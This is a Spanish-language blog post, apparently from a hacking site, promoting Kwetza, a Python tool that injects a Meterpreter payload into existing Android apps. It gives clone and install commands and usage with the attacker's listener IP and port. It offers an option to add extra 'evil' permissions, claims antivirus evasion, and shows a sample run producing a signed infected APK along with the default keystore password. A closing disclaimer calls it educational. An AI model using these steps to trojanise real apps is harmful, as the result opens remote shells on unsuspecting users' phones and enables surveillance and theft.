kwetza – script de python para inyectar un payload meterpreter en aplicaciones android existentes. [Video]

0
2981
views

Kwetza es una herramienta que le permite infectar una aplicación Android existente con un payload Meterpreter.

¿Qué hace?

Kwetza infecta una aplicación Android existente con plantillas de payloads personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza te permite infectar las aplicaciones de Android utilizando los permisos predeterminados de la aplicación de destino o inyectar permisos adicionales para obtener funcionalidad adicional.

Instalación

descargas el codigo

git clone https://github.com/sensepost/kwetza.git

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:

pip install beautifulsoup4

Kwetza requiere que Apktool sea instalado y accesible a través de su PATH. Esto se puede configurar usando las instrucciones de instalación que se encuentran aquí: https://ibotpeaches.github.io/Apktool/install

uso

python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

  • nameOfTheApkToInfect.apk =name of the APK you wish to infect.
  • LHOST =IP of your listener.
  • LPORT =Port of your listener.
  • yes =include “yes” to inject additional evil perms into the app, “no” to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes

[+] MMMMMM KWETZA


[*] DECOMPILING TARGET APK


[+] ENDPOINT IP: 10.42.0.118


[+] ENDPOINT PORT: 4444


[+] APKTOOL DECOMPILED SUCCESS


[*] BYTING COMMS...


[*] ANALYZING ANDROID MANIFEST...


[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity


[*] INJECTION INTO APK


[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED


[*] INJECTION OF CRAZY PERMS TO BE DONE!


[+] TIME TO BUILD INFECTED APK


[*] EXECUTING APKTOOL BUILD COMMAND


[+] BUILD RESULT


############################################


I: Using APktool 2.2.0


I: Checking whether source shas changed...


I: Smaling smali folder into classes.dex


I: Checking whether resources has changed...


I: Building resources...


I: Copying libs ...(/lib)


I: Building apk file...


I: Copying unknown files/dir...


###########################################


[*] EXECUTING JARSIGNER COMMAND...


Enter Passphrase for keystore: password


[+] JARSIGNER RESULT


###########################################


jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Información

Kwetza ha sido desarrollado para trabajar con Python 2.
Kwetza usará por defecto la plantilla y el keystore ubicados en la carpeta “payload” para inyectar y firmar el apk infectado.
Si desea firmar la aplicación infectada con su propio certificado, genere un nuevo keystore y colóquelo en la carpeta “payload” y cambie el nombre al keystore existente o cambie la referencia en kwetza.py.
Lo mismo se puede hacer para las plantillas de payload.
La contraseña para el keystore predeterminado es, “password”.

Video

 

 

Descarga Kwetza

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop